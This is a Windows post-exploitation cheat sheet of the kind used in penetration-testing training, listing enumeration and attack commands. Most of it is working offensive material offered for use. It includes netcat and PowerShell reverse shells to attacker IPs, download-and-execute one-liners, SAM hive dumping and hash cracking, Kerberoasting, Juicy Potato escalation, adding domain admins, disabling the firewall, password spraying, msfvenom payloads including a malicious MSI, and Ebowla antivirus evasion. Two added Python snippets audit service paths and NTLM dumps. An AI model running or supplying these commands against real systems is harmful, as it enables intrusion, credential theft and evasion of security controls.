Windows System Enumeration

SIMPLE WINDOWS ENUMERATION

All commands listed here assume you have a command prompt…
All listed items are separate commands unless otherwise specified…

SystemInfo
Network Users and Statistics
Firewall
Services and Tasks
Powershell Policy Unrestricted
View Hotfixes
List Domain Controller
Searches on Windows
Find Modules
PowerUp.ps1
Kerberoast
Juicy Potato
Inspect Files and Folders
Directory Enumeration
One-Liner Ping Script
Change Passwords
Unquoted Service Path
Crackmapexec
Brute-Force Examples
Credential Reuse
PsExec Connections
RPC
Remote Desktop
SQL
Common Enumeration Tools
Enable Windows Installer
SAM Dumps
File Transfers
Anti-Virus Evasion
Restart Windows

… Windows Versions to reference:

Operating System               Version Number
Windows 1.0                    1.04
Windows 2.0                    2.11
Windows 3.0                    3
Windows NT 3.1                 3.10.528
Windows for Workgroups 3.11    3.11
Windows NT Workstation 3.5     3.5.807
Windows NT Workstation 3.51    3.51.1057
Windows 95                     4.0.950
Windows NT Workstation 4.0     4.0.1381
Windows 98                     4.1.1998
Windows 98 Second Edition      4.1.2222
Windows Me                     4.90.3000
Windows 2000 Professional      5.0.2195
Windows XP                     5.1.2600
Windows Vista                  6.0.6000
Windows 7                      6.1.7600
Windows 8.1                    6.3.9600
Windows 10                     10.0.10240

SYSTEM INFORMATION

systeminfo | findstr "OS"
systeminfo
# EXACT WINDOWS VERSION
type C:/Windows/system32/eula.txt

NETWORK USERS / STATISTICS

# CURRENT USER
whoami /priv
whoami /all
# NETWORK STATS
netstat -ano        # network statistics
netstat -aton       # open connections
ipconfig
route print
arp -a              # ip to physical address
# COMPUTER INFO
hostname
# USERS
net user
net user /domain
net user administrator /domain
net localgroup      # local PC usergroups
net localgroup /domain
net localgroup "administrators" /domain
net group
net group /domain
net group "Domain Admins" /domain
# ADD USER
net user user user /add
net localgroup "Remote Desktop Users" user /add
net localgroup administrators user /add
# ADD DOMAIN USER
net user username password /add /domain
net group "Domain Admins" username /add /domain
# DRIVES / SERVICES
net use             # mapped network drives
net start           # shows services (manage services)
# ALL NETWORK STUFF AT ONCE
ipconfig /all & route print & arp -a

FIREWALL ENUMERATION

# FIREWALL STATUS AND CONFIGS
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall
# SOMETIMES FIREWALL WILL NEED TO BE DISABLED
netsh firewall set opmode disable

LIST SERVICES / TASKS

net start
wmic service list brief
tasklist /SVC
schtasks /query /fo LIST /v
wmic service get name,startname
wmic process where "name='chrome.exe'" get ProcessID, ExecutablePath
set

SET POWERSHELL POLICY TO UNRESTRICTED

# OFTEN USEFUL
Set-ExecutionPolicy Unrestricted

VIEW HOTFIXES

wmic qfe

LIST DOMAIN CONTROLLER

echo %logonserver%
# GRAB CREDS FROM GPP
net use z: \\dc01\SYSVOL
cd C:\Windows\SYSVOL
dir /s Groups.xml
findstr -si cpassword C:\..\Groups.xml
# Groups.xml file, find "cpassword", then gpp-decrypt on kali

SEARCH FOR KEY WORDS

# SEARCH AROUND
dir /s *password*
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
findstr /spin "password" *.*
dir /s *pass* == *cred* == *vnc* == *.config*
# COMMON FILES WITH INFO
type c:\sysprep.inf
type c:\sysprep\sysprep.xml
type c:\unattend.xml
type %WINDIR%\Panther\Unattend\Unattended.xml
type %WINDIR%\Panther\Unattended.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
# REGISTRY DUMPS
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

FIND MODULES (tons of results)

cd %appdata%

POWERUP MODULE

… found here (only one example of many)

C:\> powershell.exe -nop -exec bypass
C:\> import-module PowerUp.ps1
C:\> Invoke-AllChecks
# DOWNLOAD AND USE
C:\tmp> powershell.exe Invoke-WebRequest -Uri "http://192.168.1.299:443/PowerUp.ps1" -OutFile "C:\tmp\pu.ps1"
C:\tmp> powershell.exe import-module C:\tmp\pu.ps1
# RUN REMOTELY (IN MEMORY)
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://192.168.1.299:443/PowerUp.ps1'); Invoke-AllChecks"
LOOK FOR THINGS LIKE THIS:
ModifiableFilePermissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : Everyone

KERBEROAST

… found here (only one example of many)

# UPLOAD SCRIPT AND DUMP TOKEN
c:\tmp> powershell -ExecutionPolicy Bypass
PS C:\tmp> Import-Module .\Invoke-Kerberoast.ps1
PS C:\tmp> Invoke-Kerberoast -OutputFormat Hashcat | fl
# ELIMINATE ALL LINE BREAKS AND CRACK
hashcat -m 13100 <hashes.txt> <wordlist>
===============================
# OR REMOTELY WITH CREDENTIALS
impacket-GetUserSPNs domain.com/SVC_Account:password -dc-ip 10.10.10.299 -request
# CRACK THE GIVEN TOKEN
hashcat -m 13100 <hashes.txt> <wordlist>
# CONNECT WITH NEW CREDENTIALS
impacket-psexec active.htb/Administrator:[email protected]

JUICY POTATO

… test script found here (takes approx 15 mins to run)
… list of raw Win 10 CLSIDs found here
… Juicy Potato repo with all CLSIDs found here

# IF YOU CAN TRANSFER WITH SMB
copy \\ip\share\folder_with_jp_assets

Directory of c:\tmp
04/20/2022 04:18 AM <DIR>          .
04/20/2022 04:18 AM <DIR>          ..
04/19/2022 11:04 PM         33,813 CLSID.list
04/19/2022 11:04 PM            276 clsidfind.bat
04/20/2022 04:15 AM             46 clsidrev3000.bat
04/19/2022 11:02 PM        263,680 jp.exe
04/19/2022 11:02 PM        213,680 nc.exe

c:\tmp> .\clsidfind.bat
{C3A4B402-5900-4AB9-8D2F-F941CD24203B} 10000
{C28D5211-B8E1-44FB-994D-767725BFA20E} 10000
{BEDC0CDA-4771-4C84-A291-7DFC5AEC4745} 10000
[...]

c:\tmp> type result.log
{6d18ad12-bde3-4393-b311-099c346e6df9};NT AUTHORITY\SYSTEM
{69AD4AEE-51BE-439b-A92C-86AE490E8B30};NT AUTHORITY\SYSTEM
{F087771F-D74F-4C1A-BB8A-E16ACA9124EA};NT AUTHORITY\SYSTEM
[...]

# CONTENTS OF rev3000.bat
# c:\tmp\nc.exe 192.168.119.299 3000 -e cmd.exe
jp -l 3000 -p rev3000.bat -t * -c {F087771F-D74F-4C1A-BB8A-E16ACA9124EA}

INSPECT FILE

file <filename>
# SHORTNAME NOMENCLATURE
# FIRST 6 CHARS + ~1
C:\Program Files\LongName
C:\PROGRA~1\LONGNA~1

INSPECT FOLDER PERMISSIONS

icacls <file>
cacls <file>

DIRECTORY ENUMERATION

…search for hidden directories

cmd.exe /c dir /a C:/

…show files and subdirectories

gci -Recurse C:\users | Select FullName
ls "C:\Program Files"
ls "C:\Program Files (x86)"

ONE-LINER THINGS

… Nishang’s scripts here

# CMD SHELL PING
for /L %i in (1,1,255) do @ping -n 1 -w 200 10.5.5.%i > nul && echo 10.5.5.%i is up.
# POWER SHELL PING
FOR /L %i IN (1,1,254) DO ping -n 1 10.1.1.%i | FIND /i "Reply"
# EXECUTE REVERSE SHELL SCRIPT REMOTELY
# JUST RENAME TO shell.ps1 AND HOST THE FILE
powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/shell.ps1')

WINDOWS CHANGE PASSWORD

net user username newpassword

UNQUOTED SERVICE PATHS

… if a service path is unquoted and contains spaces, you may be able to create a binary and place it at one of the intermediate paths
… Windows will look through each part of the path for the requested binary
… if it hits your binary first, it will execute that one instead of the intended service binary

# DISPLAY SERVICES / PATHS
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
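To audit the output of that pipeline without eyeballing it, here is an added Python example (not from the original page) that applies the same filters to a constructed sample of wmic output, flags executable paths containing a space, and prints the quoted form an administrator should set. The service names and paths in SAMPLE_WMIC are hypothetical; auto_only=False extends the check to non-Auto services, which the page's pipeline skips.

```python
import re

# Constructed sample of `wmic service get name,displayname,pathname,startmode`
# output (fixed-width columns, 2+ spaces between them); hypothetical services.
SAMPLE_WMIC = r"""
Name       DisplayName       PathName                                               StartMode
Spooler    Print Spooler     C:\Windows\System32\spoolsv.exe                         Auto
GoodSvc    Good Service      "C:\Program Files\Vendor\Good Service\svc.exe" -run     Auto
BadSvc     Example Updater   C:\Program Files\Example Vendor\Updater\upd.exe /svc    Auto
ManualSvc  Manual Thing      C:\Program Files\Other Co\tool.exe                      Manual
"""

# Executable portion of a PathName ends at the first ".exe"; the rest are arguments.
_EXE_END = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE)

def parse_wmic(text):
    """Split wmic's fixed-width table into dicts keyed by the header names."""
    lines = [l for l in text.splitlines() if l.strip()]
    header = re.split(r"\s{2,}", lines[0].strip())
    return [dict(zip(header, re.split(r"\s{2,}", l.strip()))) for l in lines[1:]]

def quote_path(pathname):
    """The fix: wrap the executable path in quotes, leave arguments as they are."""
    m = _EXE_END.match(pathname.strip())
    if not m:
        return None
    return f'"{m.group(1)}"{m.group(2) or ""}'

def find_unquoted_service_paths(text, auto_only=True):
    """Same filters as the wmic | findstr pipeline above (Auto-start, not under
    C:\\Windows\\, not already quoted), then flag executable paths containing a
    space, since Windows tries each space-delimited prefix of such a path in order."""
    findings = []
    for row in parse_wmic(text):
        path = row.get("PathName", "").strip()
        if auto_only and row.get("StartMode", "").lower() != "auto":
            continue
        if path.lower().startswith("c:\\windows\\") or path.startswith('"'):
            continue
        m = _EXE_END.match(path)
        exe = m.group(1) if m else path
        if " " in exe:
            findings.append((row["Name"], path, quote_path(path)))
    return findings

if __name__ == "__main__":
    for name, path, fixed in find_unquoted_service_paths(SAMPLE_WMIC):
        print(f"{name}: {path}\n    fix -> {fixed}")
```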

CRACKMAPEXEC EXAMPLES

crackmapexec smb 10.10.1.299
crackmapexec smb 10.10.1.299 -u users.txt -p password.txt --continue-on-success >> cme_spray_10.10.1.299.txt
crackmapexec smb 10.10.1.299 -u username.txt -p password.txt --continue-on-success >> sprayoutput24.txt

BRUTE FORCE EXAMPLES

hydra -L users.txt -P passwords.txt ftp://10.10.1.299
ncrack -U users.txt -P passwords.txt ftp://10.10.1.299
patator ftp_login host=10.10.1.299 user=FILE0 password=FILE1 0=users.txt 1=passwords.txt
medusa -h 10.10.1.299 -u admin -P rockyou.txt -M http -m DIR:/admin
kerbrute -domain 10.10.1.229 -user user -passwords ./passtest.txt -outputfile kerbrute_user.txt

CREDENTIAL RE-USE

# IF YOU HAVE DOMAIN USER CREDENTIALS
runas.exe /env /noprofile /user:username password "c:\users\Public\nc.exe -nc 192.168.119.299 3000 -e cmd.exe"

PSEXEC EXAMPLES

…this works well for privilege escalation

psexec.exe -i -accepteula -d -s c:\tmp\reverse_80.exe
sudo impacket-psexec user:password@ip
sudo python3 /usr/share/doc/python3-impacket/examples/psexec.py domain.com/user:password@ip

REMOTE PROCEDURE CALL (RPC)

…reveals a ton of information if available

impacket-rpcdump ip

REMOTE DESKTOP CONNECTION

rdesktop -u user -p password <ip>
# ENABLE REMOTE DESKTOP
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
# SOMETIMES FIREWALL WILL NEED TO BE DISABLED
netsh firewall set opmode disable
# OR YOU CAN ADD A NEW USER
net user test 1234 /add
net localgroup administrators test /add

SQL CONNECTION (if available)

sqsh -S ip -U user

EXAMPLE REVERSE SHELLS

…look here for examples

COMMON ENUMERATION TOOLS

Automate the upload with this
jaws-enum.ps1 – simple powershell script
windows-exploit-suggester.py – simple python script leveraging systeminfo output
wes.py – same as windows-exploit-suggester, but updated
nishang scripts – for all stages of pen testing
windows-priv-checker2 – great for an html file display

# POSSIBLY RUN A FILE
powershell -ExecutionPolicy Bypass -File <file.ps1>
# JAWS
powershell -ExecutionPolicy Bypass -File jaws-enum.ps1
# WINDOWS-SUGGESTER
# RUN ON KALI W/ systeminfo FILE FROM WINDOWS
windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database <seen_from_update> --systeminfo systeminfo.txt
# WES
# ACQUIRE systeminfo FROM TARGET
wes.py --update
wes.py systeminfo.txt
# WINDOWS PRIVESC CHECKER 2
# OR CHANGE NAME FOR EASE: wpc2.exe
.\windows-privesc-check2.exe --audit -a -o wpc-report
# LAZAGNE
.\lazagne_pw_dump.exe all

ENABLE WINDOWS INSTALLER

… msi files are used for installations
… these can be created and the system may be able to install them
… use msi for a reverse shell

# ALWAYSINSTALLELEVATED - System Setting
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# CREATE PAYLOAD TO ADD USER
msfvenom -p windows/adduser USER=newuser PASS=newpassword -f msi -o malicious.msi
# INSTALL TO EXECUTE
msiexec /quiet /qn /i C:\malicious.msi

SAM DUMPS

… the SAM file is locked and cannot be copied directly while the system is running
… programs can dump it from memory, or you can export the hives from the registry

LAN Manager (LM): DES
    Windows NT-2003
    Passwords longer than 7 chars are split into two strings, each hashed separately
    Passwords converted to uppercase before hashing
    No salt

NT LAN Manager (NTLM): MD4
    Windows Vista+
    Not limited to two 7-char parts
    Case sensitive
    No salt

# DUMP SAMS (REQUIRES PRIV ACCESS)
reg save hklm\sam c:\tmp\sam
reg save hklm\system c:\tmp\system
# TRANSFER TO KALI
copy sam \\192.168.119.188\share
copy system \\192.168.119.188\share
# COMBINE THE FILES
samdump2 system sam
user::1004:aad3b435b51404eeeeeee435b51404ee:b74242f37e4737eeeeeeea6ebcac4ffe:::
# FOR HASHCAT, USE SECOND PART OF THE HASH
b74242f37e4737eeeeeeea6ebcac4ffe
hashcat -m 1000 user.hash /usr/share/wordlists/rockyou.txt
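The NTLM properties listed above (MD4, case sensitive, no salt) are easy to verify. The added Python example below (not from the original page) computes the NT hash as MD4 over the UTF-16LE password with a self-contained MD4, then audits a constructed pwdump-style listing of the kind samdump2 prints (user:rid:LM:NT:::) for blank passwords and for accounts sharing a password, which the missing salt makes visible without cracking anything. The usernames and hashes in SAMPLE_DUMP are constructed, not from a real SAM.

```python
import struct

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib often lacks md4 on OpenSSL 3 builds."""
    mask = 0xFFFFFFFF
    def rotl(x, n):
        x &= mask
        return ((x << n) | (x >> (32 - n))) & mask
    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)  # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1
            a, b, c, d = d, rotl(a + F(b, c, d) + X[i], (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            a, b, c, d = d, rotl(a + G(b, c, d) + X[r2[i]] + 0x5A827999, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            a, b, c, d = d, rotl(a + H(b, c, d) + X[r3[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4]), b, c
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)): no salt, case-sensitive, no 7-char split."""
    return md4(password.encode("utf-16le")).hex()

EMPTY_NT = nt_hash("")  # every blank-password account carries this exact value

# Constructed pwdump-style lines (user:rid:LM:NT:::) as samdump2 prints them; not from a real SAM.
SAMPLE_DUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1004:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""

def audit_dump(text: str) -> dict:
    """Unsalted means equal hashes imply equal passwords: report blank-password
    accounts and accounts that share a password, without cracking anything."""
    by_hash = {}
    for line in text.strip().splitlines():
        user, _rid, _lm, nt = line.split(":")[:4]
        by_hash.setdefault(nt.lower(), []).append(user)
    return {"blank": by_hash.get(EMPTY_NT, []),
            "shared": {h: users for h, users in by_hash.items() if len(users) > 1}}
```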

FILE TRANSFERS

# POWERSHELL - TRANSFER TO TARGET
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://10.11.0.4/whoami.exe', 'c:\Users\Public\whoami.exe')
(new-object System.Net.WebClient).DownloadFile('http://192.168.119.188:443/mimikatz64.exe','C:\tmp\mmk.exe')
powershell.exe Invoke-WebRequest -Uri "http://192.168.119.188:443/PowerUp.ps1" -OutFile "C:\tmp\wp64.exe"
powershell.exe Invoke-WebRequest -Uri "http://192.168.119.188:443/PowerUp.ps1" -OutFile "C:\tmp\pu.ps1"
powershell iwr http://192.168.119.188:443/system.ps1 -outfile ./shell.ps1
# RUN SCRIPT FROM ATTACK MACHINE
powershell IEX(New-Object Net.WebClient).DownloadString('http://ip/shell.ps1')
# OR
powershell -c iex(new-object net.webclient).downloadstring('http://10.10.1.299:443/shell.ps1')
# CMD
copy \\attack-ip\share\file

… reverse shell (shell.ps1) reference here

ANTI-VIRUS EVASION
EBOWLA

… Ebowla found here
… Encrypts the payload using environment variables
… Makes the encryption key pieces part of the environment-derived code
    – purpose is to have the key material on the target computer to decode, for DYNAMIC engines
    – also makes sure the payload is only made for THAT TARGET
    – uses the COMPUTER DOMAIN only, so it won’t work on someone’s home computer

https://github.com/Genetic-Malware/Ebowla.git

vim genetic.config
# CHANGE
output_type = GO
payload_type = EXE
[[ENV VAR]]
username = ''            (deleted)
computername = 'TALLY'   (got from hostname on shell)
userdomain = ''          (deleted)

# THEN CREATE THE PAYLOAD
# NOTE: NEEDS configobj AND GO, ON PYTHON2, TO MAKE THIS WORK
└─$ pip2 install configobj
└─$ sudo apt install golang
python2 ebowla.py <filename>

# USE MSFVENOM TO CREATE THE FILE
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.1.299 LPORT=80 -f exe -a x64 -o shell.exe
file shell.exe    (to make sure it's 64-bit, matching the target machine)
OUTPUT: shell.exe: PE32+ executable (GUI) x86-64, for MS Windows

# USE EBOWLA TO CREATE THE GO FILE
└─$ python2 ebowla.py ../smbuploads/shell.exe genetic.config

# BUILD WITH GO
└─$ ./build_x64_go.sh output/go_symmetric_shell.exe.go ebowla_shell.exe
file ebowla_shell.exe
OUTPUT: ebowla_shell.exe: PE32+ executable (console) x86-64, for MS Windows

CAN USE virustotal.com TO TEST THE NEW PAYLOAD

RESTART WINDOWS


shutdown /r /t 0
